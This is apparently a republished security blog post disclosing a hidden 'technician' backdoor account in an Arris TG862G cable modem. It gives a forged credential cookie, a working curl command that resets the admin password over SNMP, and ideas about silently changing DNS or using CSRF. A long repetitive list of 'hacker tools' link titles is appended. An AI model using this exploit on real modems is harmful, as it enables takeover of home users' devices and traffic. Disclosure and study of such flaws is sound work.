Arris Cable Modem Backdoor - I'm A Technician, Trust Me.

Vendor backdoors are the worst. Sloppy coding leading to unintentional "bugdoors" is somewhat defendable, but flat out backdoors are always unacceptable. Todays example is brought to you by Arris. A great quote from their site -

Subscribers want their internet to be two things, fast and worry free. Cable operators deploy services to meet the speed expectations, and trust ARRIS to provide the cable modems that deliver the reliability.

Nothing spells "trust" and "worry free" like a backdoor account, right?! Anyways, the following was observed on an Arris TG862G cable modem running the following firmware version -TS070563_092012_MODEL_862_GW

After successfully providing the correct login and password to the modems administration page, the following cookie is set (client side):

Cookie: credential=eyJ2YWxpZCI6dHJ1ZSwidGVjaG5pY2lhbiI6ZmFsc2UsImNyZWRlbnRpYWwiOiJZV1J0YVc0NmNHRnpjM2R2Y21RPSIsInByaW1hcnlPbmx5IjpmYWxzZSwiYWNjZXNzIjp7IkFMTCI6dHJ1ZX0sIm5hbWUiOiJhZG1pbiJ9

 All requests must have a valid "credential" cookie set (this was not the case in a previous FW release - whoops) if the cookie is not present the modem will reply with "PLEASE LOGIN". The cookie value is just a base64 encoded json object:

{"valid":true,"technician":false,"credential":"YWRtaW46cGFzc3dvcmQ=","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

And after base64 decoding the "credential" value we get:

{"valid":true,"technician":false,"credential":"admin:password","primaryOnly":false,"access":{"ALL":true},"name":"admin"}

Sweet, the device is sending your credentials on every authenticated request (without HTTPS), essentially they have created basic-auth 2.0 - As the kids say "YOLO". The part that stuck out to me is the "technician" value that is set to "false" - swapping it to "true" didn't do anything exciting, but after messing around a bit I found that the following worked wonderfully:

Cookie: credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9

Which decodes to the following:

{"credential":"dGVjaG5pY2lhbjo="}

And finally:

{"credential":"technician:"} 

Awesome, the username is "technician" and the password is empty. Trying to log into the interface using these credentials does not work :(

That is fairly odd. I can't think of a reasonable reason for a hidden account that is unable to log into the UI. So what exactly can you do with this account? Well, the web application is basically a html/js wrapper to some CGI that gets/sets SNMP values on the modem. It is worth noting that on previous FW revisions the CGI calls did NOT require any authentication and could be called without providing a valid "credential" cookie. That bug was killed a few years ago at HOPE 9.

Now we can resurrect the ability to set/get SNMP values by setting our "technician" account:

That's neat, but we would much rather be using the a fancy "web 2.0" UI that a normal user is accustomed to, instead of manually setting SNMP values like some sort of neckbearded unix admin. Taking a look at the password change functionality appeared to be a dead end as it requires the previous password to set a new one:

Surprisingly the application does check the value of the old password too! Back to digging around the following was observed in the "mib.js" file:

SysCfg.AdminPassword= new Scalar("AdminPassword","1.3.6.1.4.1.4115.1.20.1.1.5.1",4);

Appears that the OID "1.3.6.1.4.1.4115.1.20.1.1.5.1" holds the value of the "Admin" password! Using the "technician" account to get/walk this OID comes up with nothing:

HTTP/1.1 200 OK
Date: Tue, 23 Sep 2014 19:58:40 GMT
Server: lighttpd/1.4.26-devel-5842M
Content-Length: 55
{
"1.3.6.1.4.1.4115.1.20.1.1.5.1.0":"",
"1":"Finish"
}

What about setting a new value? Surely that will not work....

That response looks hopeful. We can now log in with the password "krad_password" for the "admin" user:

This functionality can be wrapped up in the following curl command:

curl -isk -X 'GET' -b 'credential=eyJjcmVkZW50aWFsIjoiZEdWamFHNXBZMmxoYmpvPSJ9' 'http://192.168.100.1:8080/snmpSet?oid=1.3.6.1.4.1.4115.1.20.1.1.5.1.0=krad_password;4;'

Of course if you change the password you wouldn't be very sneaky, a better approach would be re-configuring the modems DNS settings perhaps? It's also worth noting that the SNMP set/get is CSRF'able if you were to catch a user who had recently logged into their modem.

The real pain here is that Arris keeps their FW locked up tightly and only allows Cable operators to download revisions/fixes/updates, so you are at the mercy of your Cable operator, even if Arris decides that its worth the time and effort to patch this bug backdoor - you as the end user CANNOT update your device because the interface doesn't provide that functionality to you! Next level engineering.


More articles

1. Pentest Tools For Windows
2. Hacker Tools
3. Hacker Tools Apk
4. Hacker Tools For Pc
5. Physical Pentest Tools
6. Hack Tools Pc
7. Pentest Tools Website Vulnerability
8. Pentest Tools Url Fuzzer
9. Hacking Tools Name
10. Hacker Tools Github
11. What Is Hacking Tools
12. Beginner Hacker Tools
13. Hacker
14. Pentest Tools Nmap
15. Hacking Tools Software
16. Free Pentest Tools For Windows
17. Hack Tool Apk
18. How To Hack
19. Hacking Tools Hardware
20. Best Pentesting Tools 2018
21. World No 1 Hacker Software
22. Pentest Tools For Windows
23. Pentest Tools Alternative
24. Beginner Hacker Tools
25. Hacker Tools For Pc
26. Easy Hack Tools
27. Pentest Reporting Tools
28. Hacker Tools Windows
29. Wifi Hacker Tools For Windows
30. Physical Pentest Tools
31. Install Pentest Tools Ubuntu
32. Pentest Tools Github
33. Hacker Tools Free Download
34. Hack App
35. Hacker Techniques Tools And Incident Handling
36. Pentest Tools List
37. Pentest Recon Tools
38. How To Install Pentest Tools In Ubuntu
39. Hacking Apps
40. Hack Tools For Pc
41. Nsa Hacker Tools
42. World No 1 Hacker Software
43. Hacking Tools For Mac
44. Hack And Tools
45. Pentest Tools Github
46. Pentest Reporting Tools
47. Hack Tools
48. New Hack Tools
49. Best Hacking Tools 2019
50. Pentest Tools Download
51. Pentest Tools Url Fuzzer
52. Hack Tools Github
53. Hacking App
54. Hack App
55. Hacker Tools 2019
56. Hacker Tools Github
57. Black Hat Hacker Tools
58. Hacking Tools For Pc
59. Best Pentesting Tools 2018
60. Pentest Tools Apk
61. Hacker Tool Kit
62. Hack Tool Apk
63. Pentest Tools For Ubuntu
64. Hacker Tools Windows
65. Pentest Tools
66. Hak5 Tools
67. Hacker Tools For Pc
68. Hacking Tools Pc
69. Pentest Recon Tools
70. Hack Tools 2019
71. Hacker Tools For Pc
72. Hacking Tools For Mac
73. Hacker Tools 2019
74. Hack Tools For Mac
75. Hacker Tools Free Download
76. Pentest Tools
77. How To Install Pentest Tools In Ubuntu
78. Hacking Tools Hardware
79. Hack Rom Tools
80. Hacker Tools
81. Hacking Tools For Games
82. Hacking Tools 2019
83. Pentest Tools Apk
84. Hack Tools Mac
85. Hackers Toolbox
86. Github Hacking Tools
87. Hacking Tools Mac
88. Pentest Tools Free
89. Pentest Tools For Windows
90. Hacker Tools Apk
91. Pentest Box Tools Download
92. Hacking Tools
93. Pentest Tools For Windows
94. Pentest Tools Android
95. Pentest Automation Tools
96. Free Pentest Tools For Windows
97. Hack Apps
98. Hacking Tools For Windows Free Download
99. Nsa Hacker Tools
100. Hacker Tools Github
101. Game Hacking
102. Hack Tool Apk
103. Hacking Tools Kit
104. Nsa Hacker Tools
105. Pentest Tools For Mac
106. Hack Apps
107. Hacking Tools Mac
108. Hacker Tools Online
109. Nsa Hacker Tools
110. Hacking App
111. Pentest Tools Website
112. Free Pentest Tools For Windows
113. Nsa Hack Tools Download
114. Pentest Tools Tcp Port Scanner
115. Hacker Tools 2020
116. Hack Rom Tools
117. Hacking Tools For Games
118. Hacking Tools For Mac
119. Hacking Tools
120. Best Pentesting Tools 2018
121. Hack Tool Apk No Root
122. How To Install Pentest Tools In Ubuntu
123. Hacker
124. Hack Tools Pc
125. Hacking Tools Github
126. Hack Tool Apk
127. Hacker Tools Free Download
128. Pentest Automation Tools
129. Pentest Tools Website
130. Hack Tools Online
131. Hacking Tools 2020
132. Hacking Tools Hardware
133. Tools 4 Hack
134. Hacker Tools List
135. Wifi Hacker Tools For Windows
136. New Hacker Tools
137. Hack Tools 2019
138. Hacker Tools Github
139. Pentest Tools
140. Hacker Search Tools
141. Best Pentesting Tools 2018
142. Hacking Tools For Windows 7
143. Pentest Box Tools Download
144. Wifi Hacker Tools For Windows
145. Pentest Tools Alternative
146. Best Hacking Tools 2020
147. Hack Website Online Tool
148. Pentest Tools Download
149. Hacker Tools Github
150. Hacker Tools Hardware
151. Hacker Tools 2019
152. Hacking Tools For Games
153. Hacking Tools For Windows
154. Hacker Tool Kit
155. Hack Rom Tools
156. Pentest Tools Bluekeep
157. Hacking Tools Mac
158. Hacker Tools List
159. Hacking Tools Online
160. Hacker Tools List
161. Pentest Reporting Tools
162. Hack Tools For Mac
163. Computer Hacker
164. Ethical Hacker Tools
165. Pentest Tools Bluekeep